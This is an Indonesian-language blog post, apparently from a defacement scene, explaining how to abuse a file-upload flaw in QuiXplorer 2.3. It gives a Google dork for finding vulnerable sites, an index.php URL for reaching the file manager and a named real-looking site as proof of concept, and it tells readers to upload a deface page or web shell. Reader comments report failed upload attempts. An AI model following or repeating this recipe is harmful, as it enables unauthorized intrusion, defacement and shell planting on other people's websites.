Name: QuiXplorer 2.3 Upload Vulnerability

Dork: intitle:”QuiXplorer 2.3 – the QuiX project”

Exploit: http://%5Btarget%5D/%5Bpath%5D/index.php?action=list&order=name&srt=yes

Kali ini lagi gak mau basa-basi dulu langsung aja kita mulai yah. Oke cari dulu target kita pake dork diatas biasa pake bantuan mbah google. Kalo udah nemu target langsung kita coba upload file kita, tapi ada juga beberapa website yang perlu kita exploit pake url diatas.

quixplorer

POC: http://chilivihao.com/admin/manager/index.php

Kalo udah gini ya tinggal kita upload aja deh file deface/shell kita. Oke selamat mencoba🙂

GoogleWikipedia: Google Inc. is an American multinational corporation that provides Internet-related products and services, including internet search, cloud computing, software and advertising technologies.

Comments
  1. amnoe4fly says:

    ane pelajari dulu ndan

  2. rendy says:

    format file nya harus apa ini, saya sudah coba .txt .php .html gak mau ? .

    mesti apa lagi gan ? .

  3. agus says:

    ko pas upload error… file upload failed.. itu gimana yah..

Silakan Komentar Jika Kurang Jelas

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s